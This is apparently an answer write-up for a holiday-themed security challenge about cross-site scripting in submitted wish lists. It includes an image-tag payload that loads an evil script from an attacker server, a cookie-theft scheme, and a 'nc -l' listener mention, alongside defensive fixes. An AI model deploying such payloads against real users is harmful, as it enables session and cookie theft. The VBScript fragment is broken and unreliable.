By Ron Sweeney
What is the purpose of the first malicious wish text, and how does it work?
For example if the child put:
<IMG ID="Picture" HEIGHT=0 WIDTH=0 SRC="http://www.bumblesnowmonster.com/Sample.jpg" BORDER=0>
The analyst elf would see "nothing" or a broken image
embedded in the submission. Typicallyyou can use a transparent 1 X 1 image to accomodate this task.
You could also tail the log of "bumblesnowmonster.com", bounce it off a rogue mail script, or setup nc -l
<img src='http://www.bumblesnowmonster.com/clear.gif' onload='document.scripts(0).src="http://myserver/eviljavUrscript.js"'
This would make the script source the source of the first page and make the analyst's browser
load and execute the evil script. The script here could be something like:
Set WWObj = CreateObject("Word.Document")
document.write("I just ate 37 bytes on your hard drive")
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
Next ' cdrom
which makes for a great coffee holder!
2. What is the purpose of the second malicious wish text, and how does it work?
wish actually embeds the elves cookie as an argument to a script on the "http://myserver" from there it can be "dug out" of the server requests on "myserver" so the evil children can acces
the same list as the analysts. Probably write a cool script called naughty2nice.pl and post it to BUGTRAQ too.
3. How could Hermey and Rudolph thwart the first and second types of attacks by altering the
Web application? Alternatively, how could they stop these attacks by changing the configuration of the
analyst elves' browsers?
You can lock down the web application by disabling cross-site scripting or by
ignoring certain input types in the text box for the front end of the submissions.
You can lock down down th broswers by locking down the browser to disable or prompt "access data sources across domains" or
high settings on javUrscript.
4. Beyond these browser-based attacks, Hermey was also concerned about attackers submitting similar elements in children's wish lists submitted via e-mail. What are two different
methods for defeating such attacks by altering an e-mail reader's configuration?
Turn off html or html with "preview" functionality on a mail reader. Also, some operating systems share the same security
mechanism across mail readers and internet applications, in either case you can disable or prompt "access data sources across domains" in the same manner.